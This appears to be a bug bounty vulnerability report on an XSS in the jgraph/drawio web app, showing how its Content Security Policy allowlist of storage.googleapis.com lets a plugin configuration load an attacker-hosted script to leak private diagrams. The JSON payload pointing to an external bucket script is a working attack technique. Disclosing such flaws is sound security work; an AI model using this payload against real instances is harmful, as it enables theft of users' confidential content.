XSS with CSP bypass on WEB instances in jgraph/drawio
Valid
Reported on
Sep 5th 2022
📝 Description
Drawio WEB instancesn allows https://storage.googleapis.com in CSP script-src, abusing the XSS found in this report, it is possible to bypass the CSP and leak private diagram content.
🕵️♂️ Proof of Concept
On the web application side, the javascript execution is protected by the following CSP:
...
script-src https://www.dropbox.com https://api.trello.com 'self' https://viewer.diagrams.net https://storage.googleapis.com https://apis.google.com https://*.pusher.com 'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes=' 'sha256-r/ILW7KMSJxeo9EYqCTzZyCT0PZ9gHN1BLgki7vpR+A=' 'sha256-5DtSB5mj34lxcEf+HFWbBLEF49xxJaKnWGDWa/utwQA=' 'sha256-vS/MxlVD7nbY7AnV+0t1Ap338uF7vrcs7y23KjERhKc='
...
Because it allows you to load script from https://storage.googleapis.com which is the public URL for Google Cloud Bucket, it is possible to use it to execute our code.
{
"plugins": [
"https://storage.googleapis.com/bypass_csp/xss.js"
]
}

Impact
An attacker could use it to access any user's confidential content.
We are processing your report and will contact the
jgraph/drawio
team within 24 hours.
8 months ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation